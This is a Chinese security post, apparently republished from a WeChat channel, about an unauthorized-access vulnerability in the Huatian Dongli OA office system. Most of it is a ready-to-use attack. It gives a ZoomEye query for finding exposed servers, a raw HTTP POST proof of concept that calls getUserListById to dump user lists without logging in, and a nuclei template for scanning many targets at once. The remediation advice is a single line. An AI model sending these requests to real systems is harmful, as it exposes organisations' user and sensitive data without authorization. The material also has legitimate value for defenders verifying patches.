0x01 产品简介
华天动力协同办公系统将先进的管理思想、管理模式和软件技术、网络技术相结合,为用户提供了低成本、高效能的协同办公和管理平台。睿智的管理者通过使用华天动力协同办公平台,在加强规范工作流程、强化团队执行、推动精细管理、促进营业增长等工作中取得了良好的成效。华天动力OA存在未授权访问漏洞,攻击者可以读取用户信息,读取敏感信息等,利用 ZoomEye搜索引擎发现影响资产9000+。
声明
请自行搭建环境进行漏洞测试,该公众号或作者星球分享的工具、项目、漏洞仅供安全研究与学习之用请勿用于非法行为,如用于其他用途,由使用者承担全部法律及连带责任,与作者和本公众号无关。
TIPS: 末尾领取资料及福利-批量检测脚本在末尾
0x02 漏洞描述
未授权访问漏洞是一个在企业内部非常常见的问题,这种问题通常都是由于安全配置不当、认证页面存在缺陷,或者压根就没有认证导致的。
0x03 ZoomEye语法
app:"华天动力 OA"
0x04 漏洞复现
POC
POST /OAapp/bfapp/buffalo/hrApplicationFormService HTTP/1.1
Host: {}
Content-Length: 283
Pragma: no-cache
Accept: application/json, text/plain, */*
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Content-Type: text/xml;charset=utf-8
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=E23F65531C015A84CE70FBBEAFDA5296
Connection: close
<buffalo-call>
<method>getUserListById</method>
<boolean>1</boolean>
<string></string>
<string>2</string>
<string></string>
<string></string>
<boolean>1</boolean>
<boolean>1</boolean>
</buffalo-call>
id: huatian-OA-information-disclosure
info:
name: huatian-OA-information-disclosure
author: HackTwo
severity: high
http:
- raw:
- |
POST /OAapp/bfapp/buffalo/hrApplicationFormService HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.9
Cache-Control: no-cache
Connection: close
Content-Type: text/xml;charset=utf-8
<buffalo-call>
<method>getUserListById</method>
<boolean>1</boolean>
<string></string>
<string>2</string>
<string></string>
<string></string>
<boolean>1</boolean>
<boolean>1</boolean>
</buffalo-call>
matchers-condition: and
matchers:
- type: dsl
dsl:
- 'len(body)>1000'
0x05 修复建议
鉴权,对接口进行用户鉴权
0x06
原文始发于微信公众号(渗透安全HackTwo):华天动力OA办公系统存在未授权访问漏洞(新)-漏洞挖掘
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论